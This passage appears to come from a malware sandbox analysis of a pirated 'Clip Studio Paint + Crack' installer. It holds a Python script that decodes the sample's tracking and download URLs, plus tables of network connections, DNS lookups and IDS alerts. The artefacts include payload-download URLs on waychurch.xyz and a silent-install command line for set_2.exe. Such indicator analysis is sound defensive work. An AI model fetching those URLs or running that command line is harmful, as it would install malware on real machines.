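            "&title=Q2xpcCBTdHVkaW8gUGFpbnQgNS45LjEwICsgTWF0ZXJpYWxzIC0gUDJQICsgQ3JhY2s=&sub=")
LOD_URL = ("http://waychurch.xyz/lod.php?fz=&d=nsis&msg=&r=offer_exists&ko=no"
           "&o=1662&a=2632&dn=420&spot=1&t=1716631000")
DOL_URLS = ["http://waychurch.xyz/dol.php?paw=433835&spot=2&a=2632&on=310&o=365",
            "http://waychurch.xyz/dol.php?paw=964334&spot=3&a=2632&on=416&o=1658"]
BEACON_URL = ("https://resolverapp.com/p?machine_id=90059c37-1320-41a4-b58d-2b75a9850d2f"
              "&publisher_id=2964&event=install&component=agent&click_id=")
SET2_CMDLINE = (r'"C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" '
                r'/VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632')

ARTIFACTS = [ARPK_URL, LOD_URL, *DOL_URLS, BEACON_URL, SET2_CMDLINE]


def b64_text(value: str):
    """Decode a query value as base64 text (standard or URL-safe alphabet).
    Returns None unless the bytes are valid, printable UTF-8; short values are
    skipped because almost any short token happens to be valid base64."""
    if len(value) < 8:
        return None
    padded = value + "=" * (-len(value) % 4)
    for altchars in (None, b"-_"):
        try:
            text = base64.b64decode(padded, altchars=altchars, validate=True).decode("utf-8")
        except ValueError:            # binascii.Error and UnicodeDecodeError
            continue
        if text.isprintable():
            return text
    return None


def decode_tracking_url(url: str) -> dict:
    """Split a tracking URL into its parameters; decode base64 text values and
    Unix-timestamp-looking values (2017..2033) where present."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    decoded, timestamps = {}, {}
    for key, value in params.items():
        text = b64_text(value)
        if text is not None:
            decoded[key] = text
        if value.isdigit() and 1_500_000_000 <= int(value) <= 2_000_000_000:
            timestamps[key] = datetime.fromtimestamp(int(value), tz=timezone.utc).isoformat()
    return {"host": parts.hostname, "path": parts.path, "params": params,
            "decoded": decoded, "timestamps": timestamps}


def shared_ids(artifacts, min_hits: int = 2) -> dict:
    """Numeric tokens (3+ digits, not inside a GUID or word) that recur across
    independent artefacts; such tokens are usually affiliate or campaign IDs."""
    hits = {}
    for text in artifacts:
        for token in set(re.findall(r"(?<![\w-])\d{3,}(?![\w-])", text)):
            hits[token] = hits.get(token, 0) + 1
    return {t: n for t, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for url in (ARPK_URL, LOD_URL, BEACON_URL):
        info = decode_tracking_url(url)
        print(info["host"], info["path"], info["decoded"], info["timestamps"])
    print("shared ids:", shared_ids(ARTIFACTS))
```

On these inputs the title parameter decodes to the sample's own file name, t=1716631000 in the waychurch.xyz call resolves to 2024-05-25T09:56:40Z (thirty seconds after the recorded analysis start, so it is the client's own clock), and 2632 is the only identifier present in more than one artefact: it appears in the lod.php call, both dol.php redirects and the /CLICKID and /SOURCEID switches handed to set_2.exe.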

Connections

PID | Process | IP:port | Domain | ASN | CN | Reputation

4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | 172.67.145.207:80 | dollshands.icu | CLOUDFLARENET | US | unknown
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | 104.21.25.118:443 | downtownblade.xyz | CLOUDFLARENET | - | unknown
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | 23.219.78.213:80 | ctldl.windowsupdate.com | CLARO S.A. | BR | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | 23.218.185.6:80 | x1.c.lencr.org | AKAMAI-AS | US | unknown
1580 | mot.exe | 188.114.97.3:443 | waychurch.xyz | CLOUDFLARENET | NL | unknown
1580 | mot.exe | 188.114.97.3:80 | waychurch.xyz | CLOUDFLARENET | NL | unknown
1580 | mot.exe | 23.106.59.52:80 | www.primeredking.click | Leaseweb Uk Limited | GB | unknown
1580 | mot.exe | 18.66.121.63:443 | dyjqpkh7b3pfj.cloudfront.net | AMAZON-02 | US | unknown

DNS requests

Domain | IP(s) | Reputation

dollshands.icu | 172.67.145.207, 104.21.39.132 | unknown
downtownblade.xyz | 104.21.25.118, 172.67.134.52 | unknown
ctldl.windowsupdate.com | 23.219.78.213, 23.219.78.199 | whitelisted
x1.c.lencr.org | 23.218.185.6 | whitelisted
x2.c.lencr.org | 23.218.185.6 | whitelisted
waychurch.xyz | 188.114.97.3, 188.114.96.3 | unknown
www.primeredking.click | 23.106.59.52 | unknown
dyjqpkh7b3pfj.cloudfront.net | 18.66.121.63, 18.66.121.142, 18.66.121.44, 18.66.121.52 | unknown
o.ss2.us | 108.138.2.10, 108.138.2.173, 108.138.2.107, 108.138.2.195 | whitelisted
ocsp.rootg2.amazontrust.com | 18.245.39.64 | whitelisted

Threats

PID | Process | Class: Message

1088 | svchost.exe
  Potentially Bad Traffic: ET INFO DNS Query for Suspicious .icu Domain
  Potentially Bad Traffic: ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
  Potentially Bad Traffic: ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
1580 | mot.exe
  Potentially Bad Traffic: ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
1580 | mot.exe
  Potentially Bad Traffic: ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
  Potentially Bad Traffic: ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
3 ETPRO signatures available at the full report
No debug info